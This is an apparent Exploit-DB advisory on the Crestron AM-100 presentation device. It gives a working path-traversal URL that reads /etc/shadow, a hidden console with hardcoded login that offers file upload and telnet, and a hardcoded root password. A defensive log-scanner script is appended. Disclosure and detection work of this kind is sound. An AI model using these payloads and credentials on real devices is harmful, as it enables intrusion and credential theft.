Crestron AM-100 – Multiple Vulnerabilities

  • Author: Zach Lanier
    Date: 2016-11-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40813/
    =================================================================
    # Crestron AM-100 (Multiple Vulnerabilities)
    =================================================================
    # Date: 2016-08-01
    # Exploit Author: Zach Lanier
    # Vendor Homepage: https://www.crestron.com/products/model/am-100
    # Version: v1.1.1.11 - v1.2.1
    # CVE: CVE-2016-5639 
    # References: 
    # https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
    # https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md
    
    Description:
    The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.
    
    1) Path Traversal
    
    GET request: 
    http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow
    
    2) Hidden Management Console
    
    http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
    The AM-100 has a hardcoded default credential of rdtool::mistral5885.
    This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).
    
    3) Hardcoded credentials
    
    The default root password for these devices is root::awind5885.
    Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02, etc. Cleartext credentials can be read directly from these files.
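    Defenders fronting an AM-100 with a reverse proxy can spot issues 1 and 2 in the access log. The following scanner is an added example, not part of the original advisory: it flags requests to /cgi-bin/login.cgi whose src parameter contains a traversal sequence (after unwinding percent-encoding) and any access to the hidden /cgi-bin/login_rdtool.cgi console. The Common Log Format input, sample lines and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); hosts and times are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Nov/2016:10:01:02 +0000] "GET /cgi-bin/login.cgi?lang=en HTTP/1.1" 200 512
10.0.0.7 - - [22/Nov/2016:10:01:09 +0000] "GET /cgi-bin/login.cgi?lang=en&src=../../../../etc/shadow HTTP/1.1" 200 1203
10.0.0.7 - - [22/Nov/2016:10:01:15 +0000] "GET /cgi-bin/login.cgi?lang=en&src=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 981
10.0.0.9 - - [22/Nov/2016:10:02:30 +0000] "GET /cgi-bin/login_rdtool.cgi HTTP/1.1" 200 640
10.0.0.5 - - [22/Nov/2016:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Client IP, method and request target of one CLF line (timestamp is skipped).
_REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def _is_traversal(value: str) -> bool:
    """True if a query value still contains a '..' path segment after unwinding
    up to three layers of percent-encoding (catches %2e%2e and %252e%252e)."""
    decoded = value
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return ".." in decoded.replace("\\", "/").split("/")

def scan_line(line: str):
    """Classify one log line: (ip, 'path-traversal'), (ip, 'hidden-console-access'), or None."""
    m = _REQ_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    if path.endswith("/cgi-bin/login_rdtool.cgi"):
        return (m.group("ip"), "hidden-console-access")
    if path.endswith("/cgi-bin/login.cgi"):
        # parse_qs already decodes one layer; _is_traversal handles the rest.
        for src in parse_qs(parts.query, keep_blank_values=True).get("src", []):
            if _is_traversal(src):
                return (m.group("ip"), "path-traversal")
    return None

def scan_log(text: str):
    """Scan a whole log; returns the (ip, finding) hits in order of appearance."""
    return [hit for hit in map(scan_line, text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

Any hit on the hidden console, or a traversal attempt that returned 200, should be treated as a compromise indicator given the default credentials listed above.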